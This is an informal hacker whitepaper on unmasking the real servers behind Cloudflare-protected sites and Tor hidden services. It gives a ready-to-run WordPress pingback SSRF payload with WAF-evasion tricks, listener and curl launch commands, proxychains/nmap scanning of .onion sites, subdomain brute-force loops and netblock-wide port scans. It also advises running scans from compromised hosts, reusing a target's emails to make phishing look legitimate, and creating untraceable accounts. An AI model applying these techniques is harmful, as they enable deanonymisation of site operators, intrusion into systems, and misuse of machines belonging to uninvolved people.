This is a whitepaper that discusses unmasking hidden sites behind Cloudflare an Tor.
55b41d984f3de143bc1ab3d75c2bfb2181b35277644bc2e08ecee6160697f930
[[ Whitepaper on unmasking Cloudflare and Tor hidden services - v1.0.1 ]]
Introduction / FAQ
- What is cloudflare or a tor hidden service? Why is this a giant pain in the ass?
- How long will this guide be useful for?
- What about Windows?
- What are the chances of success?
- What do I do (about hacking a site) if I can't unmask the site?
- How to use nmap or other tools on a tor site
- Cloudflare unmasking hacks that don't work anymore
General Techniques for Unmasking Hidden Sites
- SSRF (exploits!)
- Wordpress's Built In SSRF
- Uploading Avatars on Forums, and Similar Common SSRFs
- Other stuff that probably connects out
- More tools
Email
- It's not hard to get most normal websites to email you
- Ask people to email you
DNS records
- MX records
- MX records that might sort of point in the general direction
- Using search engines and databases to find the real ip addresses of websites
- DNS History sites
- Brute forcing subdomains
Searching for sites based on hunches as to where they might be located
- It's kind of like using a pirate map
- Bulletproof webhosts
- Hosting companies known for hosting drug related content
- Brute forcing vhosts (and why it's a dead end)
Mapping the site structure
- Javascript files
- APIs
- Status Pages and Similar Mistakes
- Other loot
Appendix: Misc exploits, misconfigurations and tools
- Wordpress upload directory and CDNs
- changelog.txt
- Google Image Search
- Burp Collaborator Everywhere plugin
- XML input forms
- SSRF exploits that work via file conversion utilities
- Indexes to two frequently mentioned papers
- Google dorking for stuff
- Misc networking attacks
- End User Attacks
- DoS attacks
[[[ Introduction / FAQ ]]]
- What is cloudflare or a tor hidden service? Why is this a giant pain in the ass?
Cloudflare is an anti denial of service company that works by actually hiding a website. Requests to the website hit cloudflare servers first, which decide based on your ip and browser whether or not to send you to the site. The servers are some kind of reverse proxy (look it up if you've never heard of one). As an added benefit they also cache static website pages and have an optional WAF that'll fairly bad but will still interfere with your scanners. Most importantly, each ip address is only allowed to make around 23,000 requests.
You've seen cloudflare protected sites before. If you use Tor Browser to browser on normal internet you'll notice lots of sites with orange cones that want you to identify all the traffic lights in a picture. That's a cloudflare reverse proxy deciding if you're a bot. If you're trying to hack the site, all the proxies in the way get annoying.
A tor hidden service is a .onion site. There are a lot of really well thought out hidden services and this guide really won't help you that much with them. There's also a lot of really shitty vendor sites, scammers, and collections of complete weirdos that have a lot worse of security. The biggest challenges with tor sites is they rarely enable cryptographic services you can fingerprint (SSL, SSH), don't have any DNS you can use, and usually have captchas everywhere.
Some of the additional challenges involving finding tor sites include: it's harder to verify whether you've found the correct server, they don't have DNS records, and frequently have other annoyances like lots of captchas and a higher level of security. On the brighter side you can port scan tor hidden sites - with cloudflare protected sites you're limited to connecting to https until you figure out where the site is actually located.
- How long will this guide be useful for?
The last two best ways of unmasking hidden sites have stopped working in the last couple years; SSL search engines and some DNS hack that used to work 100% of the time (http://www.crimeflare.org:82/cfs.html). Unfortunately Cloudflare seems to have fixed these issues and is taking some half assed steps towards making sites slightly less identifiable by their SSL certificates.
I've organized this document from most to least commonly vulnerable type of attack. Techniques on the bottom can still work once and a while, and anyway some of the people reading this will have more success with some of the attacks than I have. It just always works that way. Some of the exploits in this paper have been tested and quite a few more have not (at least yet).
Unfortunately a lot of the URLs will break, as that is the nature of URLs. Try googling for the paper name (if it's missing) and you'll probably find it. One site listed is really useful and potentially irreplaceable, but that's about it.
- What about Windows?
All the example commands here use Linux. Many of them (like nmap) undoubtedly work on Windows. Just use Linux, and if you're trying to figure out a distribution and you like hacking stuff try Kali Linux. It's a fairly recent version of Debian stuffed full of fully functional hacking tools, which is useful.
- What are the chances of success?
Idk. On any specific site it really depends on the technical skill and attention to detail of the people running the site and how much they care about being unmasked. It's not a bad idea to find a giant collection of sites that you wouldn't mind unmasking and try some of these attacks on one after another - it'll go way faster than doing them one at a time.
- What do I do (about hacking a site) if I can't unmask the site?
If you want to launch hacks on some site and can't unmask it, you can still attack them through the cloudflare reverse proxy. Their proxies aren't that smart and only use captchas on Tor users. Their WAF is not hard to get around, and also gives you a 403 error code with the cloudflare brand so you know exactly when it's being the problem.
Cloudflare has a max number of requests per ip, and since you can't use tor, that can really slow things down a bit. I notice I can usually get around 22-23k requests per ip before getting blocked for the day.
If you search reddit.com/r/netsec some people have clever rotating proxy arrangements that involve automatically setting up hosts in AWS. This will get your AWS account banned pretty quickly, but in the mean time you're fine. I'm not that elite, so I usually just launch scans from a few different hacked hosts. There's always at least 10 morons online who're root-able if you just scan for an exploit you know works.
- How to use nmap or other tools on a tor site
Cloudflare protected sites will only allow access to https via their url. Tor hidden services allow for nearly any sort of TCP connection, so if you combine a tool like proxychains4 (aka proxychains-ng, it's just called proxychains4 in the Kali Linux repo) with anything that does normal non-raw connections to a site, you can port scan, directory brute force, etc over the socks proxy that comes with the standard tor daemon.
When using nmap you have to be careful not to do anything that requires raw sockets. You can also just launch it as a non-root user. -sT = TCP scan, -sV is lua based version detection and most important -sC launches any lua script that seems appropriate. Many of the scripts that come with nmap are for gathering information, so I'd really recommend trying them out.
Proxychains without the -q flag will tell you "socket error or timeout" about every closed port, but it's nice to be able to check that it's working. The .onion site will show as having a DNS of 224.0.0.1.
Nmap example:
proxychains4 -q nmap -P0 -sT -sV -sC -F -T4 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.onion
The ip address should come up as 224.0.0.1 and if you omit -q from proxychains it'll tell you that it timed out for every single closed port. I use -F when scanning tor sites because I'm impatient and I'm not sure tor will send a port like 23153 through anyway. I read some tor specification and I swear it said that tor doesn't actually use TCP port numbers. Anyway don't take my word for it, to specify every possible port use -p- instead of -F.
What you'd like to find are: Encrypted services that can be fingerprinted like https, ssh, smtps, etc. If it's encrypted it should involve a unique key. Banners that reveal other hostnames or ip addresses (it'd be nice if more people ran SMTP on the darknet). Usually you just find an http port and not a lot else. You can do the exact same thing with proxychains4 and netcat and most hacking tools that work over tcp.
- Cloudflare Unmasking Hacks That Don't Work Anymore
There are tons of obsolete ways of discovering what's behind a cloudflare hidden website. The best was http://crimeflare.org:82/cfs.html - if you stick in the domain of a cloudflare protected site it would use some DNS hack against Cloudflare's dns servers that would give you the real ip address almost every time. Those were the days *sigh*. You can still occasionally use it to find other sites that are associated with the same cloudflare account as the target site (discussed later).
Another hack was looking up the site's ssl fingerprint using SSL search engines. Now-a-days cloudflare is allowed to make it's own SSL certificates, so you won't run into a situation where the exact same SSL certificate is used by the cloudflare reverse proxy and the real website (ever actually). Variations on this hack are still kind of useful (you can search for serial numbers and the FQDN of the site). Overall SSL certificates are really far from the automatic win they used to be. On top of all that, the best places to search for SSL fingerprints are not that useful these days either with amazingly outdated information or never having the site that you're looking for.
I'm going to go into this in a more detail later and despite it not being that effective anymore. I'll include the syntax to search via Shodan.
--== General Techniques for Unmasking Hidden Sites
- SSRF (exploits!)
An SSRF is a type of web exploit - it's when you trick a remote server into connecting out so you can grab it's ip address (in this case). Any time a server does http(s) out and you can control the destination it's an SSRF. They're good for a lot more than that - look up Eratic's Capitol One hack if you're interested in seeing what an insecure image upload/download form did to a bank.
SSRFs are well worth looking for, and I'd say these days it's my number one or two way of identifying the real ip address of websites. They work on both Cloudflare protected sites and Tor Hidden Services. Tor Hidden Services are extremely likely to be configured on servers that are specifically configured never to make outbound connections (around half the time for non-Impedya vendor sites).
- Wordpress's Built In SSRF
Wordpress has an API that has a pingback feature in it that can be used to force any wordpress site with it enabled to connect out, assuming a that a number of conditions are met. There's a lot of vendor sites that use Wordpress. The biggest deal breaker is that blog owner must have one normal blog post that they've made themselves. The also must have an accessible xmlrpc.php file "XML-RPC server accepts POST requests only." Cloudflare's WAF actually blocks pingback requests to the API, however there's at least one really obvious way of reformatting the request so it's not blocked that I'll share here.
Conditions:
- To check if a site is running wordpress visit https://sitehere.com/readme.html - sometimes this file is removed
- The url https://sitehere.com/xmlrpc.php needs to say something about only accepting POST requests when visited.
- The blog owner must have made two blog posts or pages. Usually people make a lot of them. You want ones with simple urls like site-here.com/about-us or site-here.com/contact-us. Wordpress still supports the url ?p=XXX where X is a number above 2 or 3, but you can't use those urls, only use them to find pages in the site.
- It must be possible for the server to make an outgoing connection. Many tor hidden sites disable this in various ways. The server might need libcurl installed as well, which is common but not ubiquitous.
All this exploit does is it takes the known wordpress pingback ssrf which uses an API request called pingback.ping and formats it to use system.multicall api call. If this exploit ever gets blocked the Cloudflare, their WAF is such a PoS that there's probably a really large number of other ways of getting around it, (for example some versions Wordpress seem happy with "pingback.ping" instead of "pingback.ping", and their xml parsing library ignores up to 200 characters of <[DOCTYPE ]>). Webmasters sometimes block the xmlrpc.php file since it can be used to brute force passwords. If you're using Wordpress to run a hidden site a) you probably shouldn't and b) you should completely remove or block this file.
Alternate potential evasions if the one below stops working:
pingback.ping
pingback.ping
<!DOCTYPE note []>
Add the DOCTYPE stuff right before the first <methodCall>. Wordpress or php filters this out to prevent XXE attacks (discussed later). Which is nice because you can use it to add up to an extra 200 characters to the beginning on the xml POST request
<!DOCTYPE AAAAAAAAAAAAetc []>
The word note can be replaced with any string 189 characters or shorter
Actual exploit for hidden sites (.com, .onion, etc)
Edit http://1.2.3.4/ to your listeners url and https://hidden-target-site.com/some-page-from-the-site to a blog post on the hidden site.
------------- request.txt -------------
<?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member>
<name>methodName</name>
<value><string>pingback.ping</string></value>
</member>
<member>
<name>params</name><value><array><data>
<value><array><data>
<value><string>http://youripaddresshere/</string></value>
<value><string>https://target-site-here/blog-post-one</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
<value><struct>
<member>
<name>methodName</name>
<value><string>pingback.ping</string></value>
</member>
<member>
<name>params</name>
<value><array><data>
<value><array><data>
<value><string>http://youripaddresshere/</string></value>
<value><string>https://target-site-here/a-different-wordpress-page</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
</data></array></value>
</param>
</params>
</methodCall>
---------------------------------------
Run _any_ of these commands as root to bind to port 80 and listen for a connection.
Example listener command #1: nc -v -v -l -p 80
Example listener command #2: ncat -v -v -l 80
Example listener command #3: cd /dev/shm ; python -m SimpleHTTPServer 80
Launch the exploit with this curl command. Curl is not always installed by default.
Run the exploit:
curl -k -i -X POST https://target-site-here/xmlrpc.php -H 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36' -H "Content-Type: application/xml" -H "Accept: application/xml" --data "@request.txt"
Run the exploit against a tor site:
Same deal but start with "proxychains4 curl"
If Wordpress accepts the API request successfully then you should see "<name>faultCode</name><value><int>0</int>" in two places in the output. If nothing is stopping Wordpress from connecting out then you'll see the ip address of the server connect to you. For some versions of Wordpress there is some kind of rate limiting for pingback.ping so try to run the exploit correctly in the first 3 tries. Another cool thing about this exploit is if your request went through a non-cloudflare proxy or load balancer it'll sometimes show up as the originator of the request when you get the callback.
- Uploading Avatars on Forums, and Similar Common SSRFs
If you're trying to unmask a website that lets you sign up, please do so immediately and provide it with a valid email address. A convenient site is http://mailinator.com - it'll let you use an email address and will show you the sending ip address. Some forums will let you upload a picture for your avatar. Some of them will let you give it the URL of a remote image and it'll actually go and download the file, exposing the ip address of the server in the process.
Any exploitable RFI can also be used like an SSRF and will give you the server's ip. If you can't get the avatar to load from your website, try looking for any sort of file, document, image, pdf, etc upload form. Upload forms are a frequent source of vulnerabilities in web-apps so it's a good idea to spend time screwing with them anyway. You should stick your url into literally any form on the site that says it expects a URL. If you want to be through, anywhere that expects a URL or filename (which has a very slim but non-zero chance of working). It's a long shot but you can try sticking your url in ANY variable in a post that expects a filename. Why not? Even if remote fopen is disabled all sorts of things have libraries like curl built in that are capable of making http requests.
I wrote down a few different commands for easily listening to an ip address under the Wordpress SSRF exploit. If you're not sure if the world can reach your port and ip address, try using a website that will run nmap (there's lots of them).
- Other stuff that probably connects out
There's other things that'll connect out on the average website. Plugin updates, anything email related, cronjobs, forms that accept xml input and are vulnerable to XXE attacks, plugins that were written by idiots, some image conversion libraries (read https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html), document conversion software, PDF readers, and much more.
Overall SSRFs are either the #1 or #2 most reliable way to find a website's real ip address. #3 is probably MX (email server) DNS records, and #2 is probably getting the site to email you. After I discuss those I go into stuff that rarely works, at length.
- More tools
Onionscan has an automated list of checks that it makes against a tor site in order to find data about it. It tries to fingerprint the site in various ways, checks for status pages, open folders, and images that have exif data still included. One trick Onionscan uses is just to connect to http(s)://target-site-here/server-status to see if the Apache server-status is enabled for everyone. The Nginx equivalent is http(s)://target-site-here/status . It usually isn't enabled (in either case) for non-localhost connections but if it's allowed it'll show how many people are connected to the server. There's some other site-exposing urls listed under "Status Pages and Similar Mistakes."
Burp Proxy (Professional) will not find the site for you, but it's a big help. When you use it in proxy mode, it keeps track of all the *other* sites the main site loads files from. You can use this to find subdomains, CDNs, javascript files (which you can then go through for more URLs), and just to get a really good picture of the site's structure. Directory brute forcing tools like wfuzz, dirb666, etc only show you files and urls that are on the main site. Burp can be configured to use tor for outgoing connections in it's options panel. Just set it to use SOCK5 on port 9050 and use the proxy for dns resolution.
I always brute force directories and files. Dirb666 is the easiest to use, but I take the wordlists from DirBuster (which is entertaining to watch but rarely does a good job). It takes a very long time to go through that long of a list of directories. I'll go into it when I'm discussing less successful attacks.
--== Email
- It's not hard to get most normal websites to email you
Email is yet another way websites connect out, so it's yet another way that badly run sites will leak ip address information. Sometimes just signing up for an account is enough - you should look for any place that you can register yourself on the site and hopefully you'll get an email telling you that your account is active. If you can't setup an account look for a lost password link. Some lost password links will send you an email you even if you don't have an account.
It's really uncommon these days but you should double check that contact forms don't submit an email address when you use them. If you search your Burp proxy history for @ you'll probably notice this.
If it helps, most email contact forms at some point use the venerable Sendmail command line client (which isn't the same as the daemon of the same name). It's kind of a standardized utility, so if you're trying to figure out what parameters to inject into an email mailer, look at it's man page. The old phpmailer exploit could definitely be used to redirect email to yourself, but an ancient exploit.
If you haven't tried searching Google, Bing, and Yandex for email addresses that you've found you probably should. Just in general if you find other sites that appear to be associated with the one you're looking at you should try to track down their location as well since there's a good chance that they're hosted on the same machine.
Email shouldn't work on any tor hidden server setup by anyone with half a brain. In fact DNS, which is needed for email, shouldn't be enabled on any site that really wants to stay hidden (which is a massive hassle).
- Ask people to email you
If your target is a normal business of some sort, ask them for marketing information or help with something, then examine the full headers from the email they send you. As a plus you can use this email to make phishing email look legitimate.
--== DNS records
There's a couple ways you can potentially unmask a cloudflare protected site using DNS. DNS attacks will not work on onion sites. The most common mistake is people are kind of morons about their MX (mail exchange) records. The other is that by brute forcing subdomains and alternate TLDs and stuff, you can frequently find other sites associated with your target. Sometimes the other sites are even on the same server, it's not hard to check.
- MX records
A MX record is how smtp servers know what exactly where they're supposed to connect to in order to send mail to that domain. A surprisingly large amount of the time it points directly to the hidden site (maybe around 10%). Even if it doesn't point to the site, it's really common for email to be hosted by the same company that the site is getting it's web hosting from, which opens up a lot of scanning related possibilities. It's because it's a giant pain in the ass to run your own mail server. Remember that subdomains (including www) almost never have MX records, so if you can't find one try taking off the front of the url.
Example 1:
$ host -t MX www.xxxxxxxxxxxxxxx.net
www.xxxxxxxxxxxxxxx.net has no MX record
$ host -t MX xxxxxxxxxxxxxxx.net
xxxxxxxxxxxxxxx.net mail is handled by 0 dc-7aaba3c3a2fd.xxxxxxxxxxxxxxx.net.
$ host dc-7aaba3c3a2fd.dxxxxxxxxxxxxxxx.net
dc-7aaba3c3a2fd.xxxxxxxxxxxxxxx.net has address 82.221.131.63
Hm so 82.221.131.63 is their mail server. If you visit https://82.221.131.63 you'll get an SSL error message about a bad certificate, because it's actually for xxxxxxxxxxxxxxx.net. I figure it's ok to use them as an example since they've obviously put 0 effort into hiding their site, and I'm way too cheap to spend $100 to see if the avatar SSRF will work on them.
You can use the openssl s_client utility or the version of ncat that comes with recent versions of nmap to communicate with SSL encrypted ports. Since these days the main ip address might have a different SSL certificate than another website on the server, it's a good idea to check with the openssl client.
echo | openssl s_client -connect 82.221.131.63:443
echo | openssl s_client -connect 82.221.131.63:443 -servername correctsitename.net
If you look through the output you'll see the subject of the SSL certificate is xxxxxxxxxxxxxxx.net. I'll go into SSL in more detail later, but it's one of a few good ways of verifying whether or not a site is the target site. You can do this way easier with nmap:
root# nmap -PS443 -p443 -sT --script=SSL-cert 82.221.131.63
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-26 23:14 MST
Nmap scan report for xxxxxxxxxxxxxxx.net (82.221.131.63)
Host is up (0.30s latency).
PORT STATE SERVICE
443/tcp open https
| SSL-cert: Subject: commonName=xxxxxxxxxxxxxxx.net
| Subject Alternative Name: DNS:xxxxxxxxxxxxxxx.net, DNS:cpanel.xxxxxxxxxxxxxxx.net, DNS:cpcalendars.xxxxxxxxxxxxxxx.net, DNS:cpcontacts.drugbuyersguide.net, DNS:mail.xxxxxxxxxxxxxxx.net, DNS:webdisk.xxxxxxxxxxxxxxx.net, DNS:webmail.xxxxxxxxxxxxxxx.net, DNS:www.xxxxxxxxxxxxxxx.net
| Not valid before: 2020-10-17T00:00:00
|_Not valid after: 2021-01-15T23:59:59
There's something really important I need to point out. Did you see in the openssl commands that I specified a field called "-servername=xxxxx.com"? SSL sites these days are like http sites in that you can have more than one using the same ip address. The servername is like a vhost for https. You can alter that nmap command to look for a single servername. Keep in mind it has to be exactly right, so if the servername is "www.dumbsite.com" and you specify "dumbsite.com" it might miss it. Anyway...
How to do the same check with nmap including the servername:
nmap -PS443 -p443 -sT --script=SSL-cert --script-args="tls.servername=xxxxxxxxxxxxxxx.net" 82.221.131.63
If you're reading this to try to make your site harder to find, you should (if possible) leave the site on port 80 and absolutely never let it be the main site. When someone visits your server you want them to see a default "I just installed Nginx, what now?" website or something like that. Avoid https/SSL if possible, and don't have your site be the main site on the ip address.
- MX records that might sort of point in the general direction
The situation where the MX record points to the real main mail server happens more than you'd expect, but a sometimes it's simply pointing to a specific hosting companies' mail server. This can still be useful information. Other times it's pointed to things like bulk email services. These services usually try to figure out how many people have seen a message to appeal to more legitimate of marketing people.
So don't get too carried away and always do a whois on the ip and make sure it would make sense for a site to be hosted there. Also remember that while it's really unusual, subdomains can have their own MX records. The only place you really see that is at colleges so that each department can have their own mail server.
There's a section further down with information on doing scanning of ip ranges for websites you're looking for. I tried to organize this guide from likely to least likely to succeed so scanning for the site is down in the "unlikely to get anywhere but worth trying" section.
- Using search engines and databases to find the real ip addresses of websites
I'm going to be honest, this ALMOST NEVER WORKS ANYMORE. I may as well show you how to do it however, maybe you'll be lucky where I generally don't succeed. I never got it to succeed at all actually until I tried it on a large non-cloudflare protected site that isn't hosted by a cloud provider, so I'm vaguely curious if cloudflare has a way of keeping things out of Shodan. Anyway this used to be a fairly effective way of finding hidden sites, but cloudflare now makes their own SSL certificates for everyone and... who knows what else. This way you can't visit a cloudflare protected site, get a fingerprint from your browser, and immediately stick it in a search engine to find the real ip of the server.
Fortunately SSL has other attributes and effectively can't be turned off for non-onion sites (tor has it's own encryption protocol so SSL isn't needed). Some things you can still use to search for SSL certificates are the (actual) certificate's serial number, the RSA fingerprint if you have or can find it, and the CN (customer name) and other dns addresses in the SSL cert. I think the serial number is almost as identifying as the SSL certificate's fingerprint. My access to every SSL certificate's serial number depends on a https://crt.sh which aggregates some sort of log file SSL certificate providers have to create (idk why or how it works tbh), so hopefully this never goes away.
SSL related sites that are useful:
https://crt.sh - I've mentioned this site before. It keeps track of SSL certificates that are made through some industry standard log. It's the best place to start by far, but it's not going to give you a fingerprint you can stick into another site. It's also a good source of subdomains that you're unlikely to guess.
So search crt.sh for your target site's name. You'll usually get a list of every SSL cert they've bought, including various fingerprints and the SSL serial number (which is different). A bunch will be provisioned by cloudflare. Letsencrypt is the free SSL certificate server, Comodo + Verisign are large SSL certificate vendors, etc. You can try sticking the fingerprints and SSL serials into Shodan but it almost never works. I would say that it has never worked for me but I got it working on a completely normal website while writing this document.
The nice thing about crt.sh is they use SSL providers logs to have information on everyone's SSL certificate. You can see every single SSL certificate that site has ever purchased or had generated for them by any legitimate SSL provider. That's pretty heady stuff and you can check the SSL certificate's serial number target ips and stuff like that.
https://shodan.io - Don't get me wrong, Shodan is really cool. It scans many ports on the internet (including ssh/SSL) and lets you search through their results using a number of really useful attributes. The problem is I never find anything this way. I have some links to documentation at the bottom of this section. Most people use it to search for company names or for versions of software with known vulnerabilities.
I can find interesting stuff using it, but I can never find a cloudflare protected site's SSL. I had actually given up on it until I tried a large normal public site and it found it immediately. I'm also not sure if they still scan the entire internet. One problem is they only index the SSL certificate that's provided by the site by default. With TLS, you can have as many different SSL certificates as you have vhosts. The certificate is selected via a vhost like piece of data called the "servername." Here's an example of how to search for SSL certificates using a major website that is *not* hidden.
Try the following searches - the ip address is generally 151.101.*.193:
ssl.cert.subject.cn:imgur.com
ssl.cert.fingerprint:f4346e0c345f9fd4b5ef1ccfa5e9c1671b652aa7 (use the MD5 or RSA fingerprints)
ssl.cert.serial:036b1f6c7d65d16539f32751d0d5eb2afb75 (not the same as the cryptographic fingerprint)
It's usually a good idea to try subdomains that you saw on crt.sh as well, not to mention just searching for the certificate's serial number.
Reference material (searching with Shodan):
https://beta.shodan.io/search/filters - The official search reference
http://orkish5.tplinkdns.com/wp-content/uploads/2018/07/Shodan-Complete-Guide.pdf - Appendix E has an example (in json format) of data that's kept about SSL sites and certificates. Either it's out of date or they removed the part we need (ssl.cert.*). Ssl.dhparams.* is not the same, though I believe you can use it to see if there are additional sites with SSL certificates, just not what they are.
Other SSL related sites:
https://certdb.com https://censys.io https://spyse.com
CertDB now Spyse.com's data is incredibly outdated, but it'll occasionally tell you where sites used to be hosted. If you click around enough it'll sometimes give you some outdated ip addresses for the sites or names of hosting companies that used to be used. Any of them will do for this quick check. I don't know if Censys improved from when it was free, but the free version was not up to date at all. It's still worth checking these sites since knowing about a hidden sites past is occasionally useful.
http://crimeflare.org:82/cfs.html - This site used to be a 90% successful way of finding the real ip of a website, but there's still something extremely useful you can do with it. If the website is using Cloudflare's DNS servers (which pretty much only marketing companies do these days) you can usually pull up a list of other sites served by the same DNS servers. For example, searching for "clickfunnels.com" and then clicking on the dns server name "jim ruth" takes you here: http://www.crimeflare.org:82/cgi-bin/domlist/_14056-jim-ruth - a huge list of sites all of which are cloudflare protected and many of which are obviously operated by the same marketing company. I mainly use it when someone SMS spams my cellphone, but it can also give you a lot of hints about what company owns a website.
- DNS History sites
There are millions of them, try a google searching for them. Most of them want you to at least make an account, a few want money. I've never found something that did exactly what I want, which is to have Internet Archive style ip address records for different periods of time. Most of the time instead of a time-indexed set of DNS data (which would be nice) it's usually more like the output for Sublist3r and other sites that find dns subdomains.
The idea is sometimes people start off as a non-protected site and then later change their minds and purchase cloudflare, and it's original DNS history may still be a valid ip address for the website. Unfortunately I haven't found a site that does exactly that.
A few sites I've tried are more like DNS PI services,; they won't really tell you exactly what they need but have additional subdomains and ips you might not yet be aware of.
Links:
https://robtex.com/ - This site recently updated it's self and is now my favorite. If you log in it has a dns history section that's actually useful historic information.
https://dnsdumpster.com/
https://certdb.com/ - technically this is a horribly outdated list of ips/SSL certs, but if you wanted outdated dns information then its not a bad place to check
https://reposhub.com/cpp/miscellaneous/codingo-microsubs.html - an extremely large list of DNS history sites.
https://pastebin.com/XFqdNxQb - Another large (and different/slightly worse) list of DNS history type sites
https://www.circl.lu/services/passive-dns - costs money, I haven't tried it, but it seems popular
Off topic links - ways searching for other domains that also resolve to a specific ip address:
https://www.bing.com/search?q=ip%3a212.129.37.81 (replace with your own ip address)
https://www.robtex.com/ip-lookup/212.129.37.81 - now you have to sign in with Google to get the reverse-dns information (the important part). Any cheap android phone + prepaid sim card from 7-eleven or Walgreens will let you sign up for a new google account when you factory reset the phone. Just pay cash for everything.
"host 212.129.37.81" - bash command to do an rDNS lookup
"whois 212.129.37.81" - bash command to see who owns the netblock an ip is located in
- Brute forcing subdomains
It's a really common hacking tactic to you brute force subdomains for a known main domain. Obviously this only works on Cloudflare. It's really easy to do and there are many many tools that can do it. All your really need are a good wordlists of subdomain names. The basic idea is if you can find a subdomain that's either not hidden or badly hidden and then you can use that subdomain to try and locate your main target.
To brute force subdomains I use a combination of the hostnames.txt file that comes with recon-ng and the subdomains-top1million-110000.txt from https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS. Out of the tools listed below I actually use the bash for loops. It only makes one request at a time and it's immediately obvious when things aren't working correctly. Don't forget to also do a host -t ALL on all your discovered sites to make sure you didn't miss any weird record types like TXT or HINFO (a depreciated dns request type), and the authoritative NS servers can generally also used to brute force subdomains. The bash command to find the authoritative dns servers is "host -t NS sitename.com"
You should really edit your /etc/resolv.conf to use a public nameservers like 4.2.2.1 or 8.8.8.8. Some tools like sublist3r will use a list of open dns servers instead. Home ISPs sometimes redirect your nonexistent dns requests to a web-page filled with ads. Public nameservers sometimes won't let you make more than a certain number of requests. If you just stop finding things then the dns server you're using is probably blocking your requests, but you can check with "tcpdump -nn -i eth0 -c 100000 -v -v -A port 53". Some DNS servers don't like getting too many dns requests at once from a single ip as well. You should keep an eye out for subdomains with names like: test, stage, staging, <software name>, vpn, corporate, internal, cd, anything that seems numbered, etc.
Subdomains named staging, test, lab, stage, are places you test a site before uploading it to the main site. Sometimes they're restricted in what ips can access them. If you can reach the site it's usually basically an ignored copy of the real site, with lots of extra information in error messages. Subdomains named VPN is a good one since in the last 2 years at least 6+ VPN exploits have been released to the public. Corporate or internal subdomains can be stuff like file sharing servers or SharePoint, but I'm sort of off topic.
There's some tools that you can load subdomain wordlists into. The top one, sublist3r also searches several websites for the url you're looking for. All the SSL certificate sites listed lower that are out of date can still provide the names of subdomains that you might not find Recon-ng probably isn't the best tool to do that but works reasonably well. In the list of bash commands I included a command that you can use to combine wordlists and remove duplicate entries. There's also tools that can do unrestricted bing/google/yahoo searches but I generally don't use them because you need to buy (request?) API keys to use various search engines.
Tools:
Sublist3r - automated database recon and dns brute forcing. You can give it a list of dns servers so it'll spread the queries out and avoid triggering things intended to prevent dns from being used as a DoS amplification attack.
recon-ng - interface is slightly annoying, but it comes with a decent wordlist. It does a lot more than dns brute forcing if you set up the other features.
altdns - this one is sort of a bitch to get working. It's main thing is it'll alter known subdomains to find even more subdomains, like mail -> mail01 and 01mail, etc.
amass - It's almost the same as Sublist3r except written in Go and it uses different sets of search engines. Its in the Kali Linux repo, and it's really a pain to use:
... and way more! There's tons of them.
Wordlists:
https://github.com/lanmaster53/recon-ng/archive/v4.9.6.tar.gz - hostnames.txt from recon-ng/data, it's a very good list and it's exactly the right size, but go add these missing subdomains: share, zendesk, ticket, tickets, nfs, external01, external-01, external1 (etc), storage01, windows2008, windows2010, nas01, file-server, asa, asafw, cron, solarwinds, backoffice
https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS - This site is awesome
https://wordlists.assetnote.io/ - this I just got from reddit today, and has more amazing wordlists. Good wordlists make a HUGE difference.
Useful bash commands for dealing with text data:
Organize and remove duplicates - "cat wordlist1.txt wordlist2.txt wordlist3.txt | sort | uniq > wordlist-all.txt"
- Do NOT redirect your output to a file that's also used for input! You'll delete the file "cat file | sort > file" will end with "file" being more or less deleted.
Brute force domains using bash - "domain="site-here.com" wordlist="./path/to-wordlist.txt" for i in `cat $wordlist` ; do dig +noall +answer +retry=5 "$i.$domain" ANY | grep -ve NX -e FAIL ; done | tee $domain-subdomains.txt"
- Use a specific dns server with dig (like an authoritative one) - dig +noall +answer "$i.$domain" @ns01.site-here.com ANY
- Substitute host instead of dig (it'll use the nameservers in /etc/resolv.conf): "host -t ANY "$i.$domain"
- A lot of times if a public dns server like 4.2.2.1 is rate limiting you, the authoritative server for the domain will be more lenient. Just find them with "host -t NS site-here.com"
- For some reason doing it this way is way more reliable than amass/altdns/subbrute/etc.
whois - there's a few versions of essentially the same program. If you're not familiar with whois please go hit yourself with something. You'll probably have to install it, some versions are mwhois and jwhois.
--== Searching for sites based on hunches as to where they might be located
If you've gotten to this point your chances of figuring out where the site is located are actually pretty low. We've gone from really solid ways of getting ip info, to slightly sketchier ways, to databases that usually don't work, to this: brute force scanning. If you can come up with some suspect hosting companies it doesn't take too long to scan all of them for the site you're looking for. You generally won't find it but it's kind of fun and not hard to do. After this section there's a variation for tor sites - while you generally have no clue where they are actually located, there's a limited number of hosting companies that are friendly towards DNMs and vendor sites. If you get a good list you can just scan all of them.
If you're wondering why I'm obsessed with using SSL it's because it's accurate - a site with "www.foobar.com" in it's SSL certificate is pretty unambiguous. You'd think you can do the same thing with non SSL http sites and you really can't for what it's worth.
- It's kind of like using a pirate map
Sometimes you'll run into a situation where you either have a strong guess about where a website is hosted. Maybe their Cpanel is branded, maybe their MX record is pointed somewhere interesting, or maybe it's "general knowledge" they're hosted somewhere or in a specific country.
To scan an entire webhost or small ISP, do a whois on their IP address and grep for the AS (it'll be there somewhere). Go to https://bgp.he.net and search for ASXXXX where XXXX is the number you saw in the whois records. That'll give you an official company name. Search https://bgp.he.net again for that company name and you'll wind up with a list of Autonomous Systems. Each AS is responsible for keeping track of a number of blocks of ip addresses. (I'm avoiding explaining what an AS is. It's the BGP thing, go look it up if you want to know how the internet works). I don't have a tool to do it, but if you visit each AS and then go to IPv4 Prefixes you can make a text file that's basically a giant list of ip address/cidr netblock that'll look like:
Fake example:
185.4.211.0/24
200.128.0.0/16
200.129.0.0/16
200.139.21.0/24
200.17.64.0/16
Total ips: 145796
Store that all into a file, we'll call it netblocks.in.txt. An example the command to scan all them all with nmap is:
nmap -sS -sV -sC -T5 -p1-65535 -iL netblocks.in.txt
